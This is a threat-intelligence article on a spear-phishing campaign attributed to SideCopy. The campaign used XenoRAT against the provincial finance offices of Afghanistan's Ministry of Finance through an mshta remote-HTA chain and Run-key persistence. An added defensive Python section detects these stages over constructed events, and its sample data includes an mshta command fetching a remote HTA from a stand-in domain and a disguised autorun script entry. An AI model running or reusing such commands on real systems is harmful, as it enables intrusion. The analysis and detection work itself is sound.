Afghanistan’s Ministry of Finance has been targeted in a precision spear-phishing campaign that sought to compromise provincial revenue offices through a customised XenoRAT implant, marking a focused cyber-espionage operation against one of the country’s most sensitive civilian administrative networks. The campaign has been linked with medium-to-high confidence to SideCopy, a Pakistan-linked threat actor associated with the broader Transparent Tribe, or APT36, ecosystem. The operation targeted the ministry’s provincial revenue and finance directorates, known as Mustoufiats, across all 34 provinces, indicating an effort to reach officials handling taxation, revenue collection and financial administration outside Kabul’s central bureaucracy.
The attack began with a ZIP archive delivered through spear-phishing. Inside was a malicious Windows shortcut file disguised as a legitimate document and crafted in Pashto, a choice that points to close awareness of the target environment. The lure referred to a list of employees introduced to an intellectual and psychological warfare seminar, a title designed to appear plausible to government staff.
Once opened, the shortcut invoked mshta.exe, a legitimate Windows utility often abused by attackers to run malicious HTML application payloads. The malware then fetched a remote HTA payload from a compromised Afghan education domain, allowing the operator to execute script content without immediately dropping a conventional executable file to disk. This “living-off-the-land” technique helps malicious activity blend into normal Windows processes and weakens basic signature-based detection.
The decoy document used in the campaign was particularly notable. It appeared to be a provincial staff directory linked to the Ministry of Finance, listing officials such as finance directors, revenue chiefs, financial officers and secretaries, along with mobile numbers. The document was written in Dari and Pashto and covered all 34 provinces. Such granular administrative detail suggests pre-attack reconnaissance and raises the possibility that the attackers had already collected internal or semi-internal information before launching the operation.
The infection chain used several stages to reduce visibility. After the initial shortcut launched the remote payload, the malware created files under public Windows directories and used obfuscated JavaScript, batch scripts, registry entries and .NET-based loaders to sustain execution. Persistence was achieved by creating startup mechanisms that could survive reboot, including registry-based autorun entries camouflaged to resemble legitimate Microsoft Edge-related activity.
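As an added defender-side example (not code from the article or from any vendor), the following Python runs two detection rules over constructed Sysmon-style events for the chain stages described above: mshta.exe launched with a URL argument, and a Run-key autorun entry that executes a script from a public directory under a vendor-looking name. The event shape, domain, paths and value names are assumptions, not indicators from the campaign.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape (not real campaign data).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://compromised-edu.example/seminar.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Vendor\app.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},  # local HTA, benign here
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "MicrosoftEdgeUpdate", "data": r'"C:\Users\Public\Libraries\edge.bat"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
PUBLIC_DIRS = (r"\users\public", r"\programdata", r"\windows\temp", r"\appdata\local\temp")
SCRIPT_EXTS = (".bat", ".cmd", ".js", ".vbs", ".hta", ".ps1")
VENDOR_WORDS = ("microsoft", "edge", "windows")

def mshta_remote_launch(ev):
    """Stage 1: mshta.exe handed a URL, i.e. script content fetched from a remote host."""
    return (ev["type"] == "process"
            and ev["image"].lower().endswith(r"\mshta.exe")
            and URL_RE.search(ev["cmdline"]) is not None)

def autorun_reasons(ev):
    """Stage 2: Run-key entry running a script from a world-writable directory,
    or borrowing a vendor-looking name while not living under Program Files."""
    if ev["type"] != "registry" or not RUN_KEY_RE.search(ev["key"]):
        return []
    data, name = ev["data"].lower(), ev["value"].lower()
    reasons = []
    if any(d in data for d in PUBLIC_DIRS):
        reasons.append("runs from public/temp directory")
    if any(ext in data for ext in SCRIPT_EXTS):
        reasons.append("script-interpreter payload")
    if any(w in name for w in VENDOR_WORDS) and "\\program files" not in data:
        reasons.append("vendor-like name outside Program Files")
    return reasons

def triage(events):
    """Return (rule, detail) pairs for every event that trips a rule."""
    findings = []
    for ev in events:
        reasons = autorun_reasons(ev)
        if mshta_remote_launch(ev):
            findings.append(("mshta_remote_hta", ev["cmdline"]))
        elif reasons:
            findings.append(("suspicious_autorun", f"{ev['value']}: {'; '.join(reasons)}"))
    return findings
```

The benign local-HTA and OneDrive entries are included so the rules can be checked for false positives against ordinary activity before being deployed as an EDR or SIEM query.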
The final payload was XenoRAT 1.8.7, an open-source remote access trojan that has been adapted by threat actors for surveillance and post-exploitation activity. Once active, it connected to attacker-controlled command-and-control infrastructure through a hard-coded IP address and port configuration. The implant used encrypted TCP communication, compressed traffic and reconnection logic to maintain access to compromised hosts.
XenoRAT’s functions make it particularly damaging in a government finance environment. The malware can collect system information, execute commands remotely, upload and download files, monitor the clipboard, capture screenshots, log keystrokes and access webcam or microphone functions. It can also load external modules in memory, allowing the operator to expand capabilities without deploying new files that may be easier to detect.
The use of XenoRAT reflects a wider trend among South Asia-focused espionage groups: the adaptation of open-source malware into tailored implants. Open-source tools reduce development costs and complicate attribution because multiple groups can use similar code. SideCopy has previously used remote access trojans and staged payloads in operations against government, defence and public-sector targets in the region, with a pattern of abusing trusted Windows utilities, compressed archives and socially tailored lures.
The infrastructure behind the Afghanistan campaign was split across delivery and command layers. The initial payload was hosted through an Afghan domain, while the RAT beaconed to separate European hosting infrastructure. This separation can help attackers preserve access if one element is detected and removed. The delivery domain’s use of local-looking infrastructure also appears designed to lower suspicion among targets.
For Afghanistan’s Ministry of Finance, the implications extend beyond infected workstations. Provincial revenue offices hold operational data on tax administration, personnel, communications and financial flows. Access to such systems could allow an espionage actor to map administrative structures, identify key officials, monitor internal correspondence or collect material useful for follow-on social engineering.
The targeting of provincial offices rather than only the central ministry suggests a strategy aimed at weaker endpoints in a distributed bureaucracy. Provincial directorates may have uneven cyber-defence capacity, older Windows systems, limited monitoring and fewer specialist staff than central agencies. Attackers often exploit such gaps to establish footholds that can later be used to move through connected networks.